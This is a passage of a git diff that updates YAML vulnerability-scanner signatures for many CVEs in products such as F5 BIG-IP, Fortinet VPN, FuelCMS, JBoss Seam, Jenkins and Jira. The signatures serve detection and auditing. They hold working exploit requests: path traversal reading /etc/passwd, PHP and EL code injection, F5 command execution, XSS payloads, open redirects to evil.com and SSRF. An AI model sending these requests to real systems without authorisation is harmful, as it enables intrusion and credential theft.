- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
@@ -18,7 +17,7 @@ requests:
StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
- method: GET
url: >-
- {{.root}}cvebase.txt
+ {{.root}}/cvebase.txt
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/exacqvision-web-service-rce-cve-2020-9047.yaml b/cves/exacqvision-web-service-rce-cve-2020-9047.yaml
index f6f0231..3ca9dff 100644
--- a/cves/exacqvision-web-service-rce-cve-2020-9047.yaml
+++ b/cves/exacqvision-web-service-rce-cve-2020-9047.yaml
@@ -4,13 +4,13 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
requests:
- method: GET
url: >-
- {{.root}}version.web
+ {{.root}}/version.web
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/f5-bigip-rce-cve-2020-5902.yaml b/cves/f5-bigip-rce-cve-2020-5902.yaml
index 092fc01..3dd487e 100644
--- a/cves/f5-bigip-rce-cve-2020-5902.yaml
+++ b/cves/f5-bigip-rce-cve-2020-5902.yaml
@@ -4,13 +4,13 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
redirect: false
url: >-
- {{.root}}tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
+ {{.root}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
@@ -20,7 +20,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
+ {{.root}}//tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
diff --git a/cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml b/cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml
index 2dd5bf6..fb2c4a2 100644
--- a/cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml
+++ b/cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml
@@ -10,7 +10,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%3E
+ {{.root}}//remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%3E
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
@@ -19,7 +19,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/message?title=x&msg=%26%23;
+ {{.root}}//message?title=x&msg=%26%23;
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
@@ -28,7 +28,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
+ {{.root}}//remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
diff --git a/cves/fuelcms-rce-cve-2018-16763.yaml b/cves/fuelcms-rce-cve-2018-16763.yaml
index 2fce8b6..87231cc 100644
--- a/cves/fuelcms-rce-cve-2018-16763.yaml
+++ b/cves/fuelcms-rce-cve-2018-16763.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,11 +12,12 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27
+ {{.root}}/{{.endpoint}}?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
- StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
+ StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
+
references:
- https://www.cvebase.com/cve/2018/16763
diff --git a/cves/glpi-open-redirect-cve-2020-11034.yaml b/cves/glpi-open-redirect-cve-2020-11034.yaml
index fc909bb..554ae05 100644
--- a/cves/glpi-open-redirect-cve-2020-11034.yaml
+++ b/cves/glpi-open-redirect-cve-2020-11034.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,8 +12,8 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?redirect=/\/evil.com/
- {{.root}}{{.endpoint}}?redirect=//evil.com
+ {{.root}}/{{.endpoint}}?redirect=/\/evil.com/
+ {{.root}}/{{.endpoint}}?redirect=//evil.com
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/grafana-api-improper-authorization-cve-2019-15043.yaml b/cves/grafana-api-improper-authorization-cve-2019-15043.yaml
index 4cd6e03..f183175 100644
--- a/cves/grafana-api-improper-authorization-cve-2019-15043.yaml
+++ b/cves/grafana-api-improper-authorization-cve-2019-15043.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,15 +12,16 @@ variables:
requests:
- method: POST
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Content-Type: application/json
- - Host: '{{Hostname}}'
- body: >-
+ - Host: '{{.Host}}'
+ body: |
{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":[{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":3600}
detections:
- >-
StringSearch("resBody", 'deleteKey')
+
references:
- https://www.cvebase.com/cve/2019/15403
diff --git a/cves/grafana-dos-cve-2020-13379.yaml b/cves/grafana-dos-cve-2020-13379.yaml
index 53a783c..e4b3458 100644
--- a/cves/grafana-dos-cve-2020-13379.yaml
+++ b/cves/grafana-dos-cve-2020-13379.yaml
@@ -1,21 +1,32 @@
id: CVE-2020-13379
info:
- name: Grafana DoS
+ name: Grafana DoS Probing
risk: High
params:
- - root: '{{.BaseURL}}/'
-
+ - root: '{{.BaseURL}}'
+
+variables:
+ - endpoint: |
+ /
+ /grafana/
+ /debug/grafana/
+ /-/grafana/
+ /gitlab/-/grafana/
+ /-/debug/grafana/
+
requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
- {{.root}}
+ {{.root}}{{.endpoint}}avatar/120
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
- StatusCode() == 502
+ StatusCode() == 200 && StringSearch("resHeaders", "Content-Type: image/jpeg") && StringSearch("body", "IEND") && StringSearch("body", "PNG")
references:
- https://www.cvebase.com/cve/2020/13379
+ - note: |
+ Patched instance will show 404 code. Real DoS POC is http://target.com/avatar/%25anything
\ No newline at end of file
diff --git a/cves/graphql-playround-xss-cve-2020-4038.yaml b/cves/graphql-playround-xss-cve-2020-4038.yaml
index 7169c4b..334c38a 100644
--- a/cves/graphql-playround-xss-cve-2020-4038.yaml
+++ b/cves/graphql-playround-xss-cve-2020-4038.yaml
@@ -25,7 +25,7 @@ requests:
{{.root}}{{.graph}}{{.xss}}
detections:
- >-
- StatusCode() == 200 && StringSearch("body", '')
+ StatusCode() == 200 && StringSearch("resHeaders", "text/html") && StringSearch("body", '')
references:
- link: https://github.com/prisma-labs/graphql-playground/security/advisories/GHSA-4852-vrh7-28rf
diff --git a/cves/icewarp-lfi-cve-2019-12593.yaml b/cves/icewarp-lfi-cve-2019-12593.yaml
index 5ba035e..08514bc 100644
--- a/cves/icewarp-lfi-cve-2019-12593.yaml
+++ b/cves/icewarp-lfi-cve-2019-12593.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
+ {{.root}}/{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
@@ -20,7 +20,7 @@ requests:
StatusCode() == 200 && StringSearch("resBody", "[intl]")
- method: GET
url: >-
- {{.root}}{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
+ {{.root}}/{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/icewarp-webmail-xss-cve-2020-8512.yaml b/cves/icewarp-webmail-xss-cve-2020-8512.yaml
index cb0ddf7..ab97c4a 100644
--- a/cves/icewarp-webmail-xss-cve-2020-8512.yaml
+++ b/cves/icewarp-webmail-xss-cve-2020-8512.yaml
@@ -4,18 +4,18 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
requests:
- method: GET
url: >-
- {{.root}}webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
+ {{.root}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "")
+ StatusCode() == 200 && StringSearch("body", "IceWarp WebClient") && StringSearch("body", "")
references:
- https://www.cvebase.com/cve/2020/8512
diff --git a/cves/imind-server-info-leak-cve-2020-24765.yaml b/cves/imind-server-info-leak-cve-2020-24765.yaml
index 0c1902b..e7c135f 100644
--- a/cves/imind-server-info-leak-cve-2020-24765.yaml
+++ b/cves/imind-server-info-leak-cve-2020-24765.yaml
@@ -4,12 +4,12 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1
+ {{.root}}/api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/infinitewp-improper-authentication-cve-2020-8772.yaml b/cves/infinitewp-improper-authentication-cve-2020-8772.yaml
index 877aac2..1962bd1 100644
--- a/cves/infinitewp-improper-authentication-cve-2020-8772.yaml
+++ b/cves/infinitewp-improper-authentication-cve-2020-8772.yaml
@@ -4,16 +4,17 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
requests:
- method: POST
url: >-
- {{.root}}wp-admin/
+ {{.root}}/wp-admin/
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- body: _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
+ body: |
+ _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
detections:
- >-
StringSearch("resHeaders", "IWPHEADER")
diff --git a/cves/jboss-seam-code-execution-cve-2010-1871.yaml b/cves/jboss-seam-code-execution-cve-2010-1871.yaml
index 850650e..1ea5190 100644
--- a/cves/jboss-seam-code-execution-cve-2010-1871.yaml
+++ b/cves/jboss-seam-code-execution-cve-2010-1871.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -13,7 +13,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}{{.endpoint}}?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName(%27java.lang.Runtime%27).getDeclaredMethods()[7]}
+ {{.root}}/{{.endpoint}}?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName(%27java.lang.Runtime%27).getDeclaredMethods()[7]}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/jenkins-gitlab-xss-cve-2020-2096.yaml b/cves/jenkins-gitlab-xss-cve-2020-2096.yaml
index a886c56..e41a0ad 100644
--- a/cves/jenkins-gitlab-xss-cve-2020-2096.yaml
+++ b/cves/jenkins-gitlab-xss-cve-2020-2096.yaml
@@ -4,19 +4,28 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
-variables:
- - endpoint: |
- gitlab/
-requests:
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}{{.endpoint}}build_now%3Csvg/onload=alert(1337)%3E
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ {{.root}}/gitlab/build_now/a'">
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "")
+ StringSearch("response", "know how to process") || StringSearch("response", "See https://github.com/elvanja/jenkins-gitlab-hook-plugin for details")
+ - >-
+ StatusCode() == 200 && StringSearch("response", "Gitlab Web Hook")
+ - method: GET
+ redirect: false
+ url: >-
+ {{.root}}/git/build_now/a'">
+ detections:
+ - >-
+ StringSearch("response", "know how to process") || StringSearch("response", "See https://github.com/elvanja/jenkins-gitlab-hook-plugin for details")
+ - >-
+ StatusCode() == 200 && StringSearch("response", "Gitlab Web Hook")
+
references:
- - https://www.cvebase.com/cve/2020/2096
+ - author: j3ssie
+ - link: https://www.cvebase.com/cve/2020/2096
diff --git a/cves/jenkins-xss-cve-2019-10475.yaml b/cves/jenkins-xss-cve-2019-10475.yaml
index 0c67572..d8486a9 100644
--- a/cves/jenkins-xss-cve-2019-10475.yaml
+++ b/cves/jenkins-xss-cve-2019-10475.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -14,7 +14,7 @@ requests:
- method: GET
redirect: true
url: >-
- {{.root}}{{.endpoint}}?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
+ {{.root}}/{{.endpoint}}?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
@@ -23,14 +23,14 @@ requests:
- method: GET
redirect: true
url: >-
- {{.BaseURL}}{{.endpoint}}?label=reallylongtring
+ {{.root}}/{{.endpoint}}?label=reallylongtring
detections:
- >-
StatusCode() == 200 && StringSearch("response", "reallylongtring")
- method: GET
redirect: true
url: >-
- {{.BaseURL}}{{.endpoint}}?label=reallylongtring
+ {{.root}}/{{.endpoint}}?label=reallylongtring
detections:
- >-
StatusCode() == 200 && StringSearch("response", "reallylongtring")
diff --git a/cves/jenkins-xss-cve-2020-2140.yaml b/cves/jenkins-xss-cve-2020-2140.yaml
index bb3f180..57a22e7 100644
--- a/cves/jenkins-xss-cve-2020-2140.yaml
+++ b/cves/jenkins-xss-cve-2020-2140.yaml
@@ -4,20 +4,22 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
-
-variables:
- - endpoint: |
- descriptorByName/AuditTrailPlugin/regexCheck
- jenkins/descriptorByName/AuditTrailPlugin/regexCheck
-requests:
+ - root: "{{.BaseURL}}"
+
+replicate:
+ ports: '8080'
+ prefixes: 'jenkins'
+
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}{{.endpoint}}?value=*j%3Ch1%3Esample
+ {{.root}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*jsample
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "sample")
+ StatusCode() == 200 && StringSearch("response", "sample") && StringSearch("response", "regular expression")
+
references:
- https://www.cvebase.com/cve/2020/2140
diff --git a/cves/jenkins-xss-cve-2020-2199.yaml b/cves/jenkins-xss-cve-2020-2199.yaml
index 3771a94..1b2836b 100644
--- a/cves/jenkins-xss-cve-2020-2199.yaml
+++ b/cves/jenkins-xss-cve-2020-2199.yaml
@@ -6,15 +6,15 @@ info:
params:
- root: "{{.BaseURL}}"
-variables:
- - file: |
- /
- /jenkins/
+replicate:
+ ports: '8080'
+ prefixes: 'jenkins'
+
requests:
- method: GET
redirect: false
url: >-
- {{.root}}{{.file}}scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:zie
+ {{.root}}/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:zie
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
diff --git a/cves/jira-improper-authorization-cve-2019-8446.yaml b/cves/jira-improper-authorization-cve-2019-8446.yaml
index 8a64643..24aabc9 100644
--- a/cves/jira-improper-authorization-cve-2019-8446.yaml
+++ b/cves/jira-improper-authorization-cve-2019-8446.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,18 +12,16 @@ variables:
requests:
- method: POST
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Connection: Close
- - Sec-Fetch-User: ?1
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
- - Sec-Fetch-Site: none
- - Sec-Fetch-Mode: navigate
- X-Atlassian-Token: no-check
- Accept-Encoding: gzip, deflate
- Accept-Language: en-US,en;q=0.9
- body: {'jql':'project in projectsLeadByUser("g147isalive")'}
+ body: |
+ {'jql':'project in projectsLeadByUser("g147isalive")'}
detections:
- >-
StringSearch("resBody", "the user does not exist")
diff --git a/cves/jira-info-leak-cve-2019-8449.yaml b/cves/jira-info-leak-cve-2019-8449.yaml
index 1573ebf..3daef5b 100644
--- a/cves/jira-info-leak-cve-2019-8449.yaml
+++ b/cves/jira-info-leak-cve-2019-8449.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?query=1&maxResults=50000&showAvatar=true
+ {{.root}}/{{.endpoint}}?query=1&maxResults=50000&showAvatar=true
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/jira-info-leak-cve-2020-14179.yaml b/cves/jira-info-leak-cve-2020-14179.yaml
index e803303..16f71fb 100644
--- a/cves/jira-info-leak-cve-2020-14179.yaml
+++ b/cves/jira-info-leak-cve-2020-14179.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,13 +12,13 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}!Default.jspa
+ {{.root}}/{{.endpoint}}!Default.jspa
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Referer: "{{.root}}/webadmin/admin/service_manager_data.php"
detections:
- >-
- StatusCode() == 200 && (StringSearch("resBody", "searchers") || StringSearch("resBody", "groups")
+ StatusCode() == 200 && (StringSearch("resBody", "searchers") || StringSearch("resBody", "groups"))
references:
- https://www.cvebase.com/cve/2020/14179
diff --git a/cves/jira-path-traversal-cve-2019-8442.yaml b/cves/jira-path-traversal-cve-2019-8442.yaml
index 768da07..ddbaffb 100644
--- a/cves/jira-path-traversal-cve-2019-8442.yaml
+++ b/cves/jira-path-traversal-cve-2019-8442.yaml
@@ -4,20 +4,23 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
-requests:
+
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
detections:
- >-
- StringSearch("resBody", "artifactId")
+ StatusCode() == 200 && StringSearch("body", "") && StringSearch('body', '')
+
references:
- https://www.cvebase.com/cve/2019/8442
diff --git a/cves/jira-ssrf-cve-2017-9506.yaml b/cves/jira-ssrf-cve-2017-9506.yaml
index 38134a7..6a13652 100644
--- a/cves/jira-ssrf-cve-2017-9506.yaml
+++ b/cves/jira-ssrf-cve-2017-9506.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?consumerUri=https://ipinfo.io/json
+ {{.root}}/{{.endpoint}}?consumerUri=https://ipinfo.io/json
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/jira-ssrf-cve-2019-8451.yaml b/cves/jira-ssrf-cve-2019-8451.yaml
index 99e491f..55aa344 100644
--- a/cves/jira-ssrf-cve-2019-8451.yaml
+++ b/cves/jira-ssrf-cve-2019-8451.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?url=https://{{Hostname}}:1337@example.com
+ {{.root}}/{{.endpoint}}?url=https://{{.Host}}:1337@example.com
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- X-Atlassian-token: no-check
diff --git a/cves/jira-ssti-cve-2019-11581.yaml b/cves/jira-ssti-cve-2019-11581.yaml
index 49c4cd9..d3350a0 100644
--- a/cves/jira-ssti-cve-2019-11581.yaml
+++ b/cves/jira-ssti-cve-2019-11581.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}!default.jspa
+ {{.root}}/{{.endpoint}}!default.jspa
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/jira-user-enumeration-cve-2020-14181.yaml b/cves/jira-user-enumeration-cve-2020-14181.yaml
index 5d467f9..3b42f5d 100644
--- a/cves/jira-user-enumeration-cve-2020-14181.yaml
+++ b/cves/jira-user-enumeration-cve-2020-14181.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/jira-xss-cve-2018-20824.yaml b/cves/jira-xss-cve-2018-20824.yaml
index 4ab7d41..8e12176 100644
--- a/cves/jira-xss-cve-2018-20824.yaml
+++ b/cves/jira-xss-cve-2018-20824.yaml
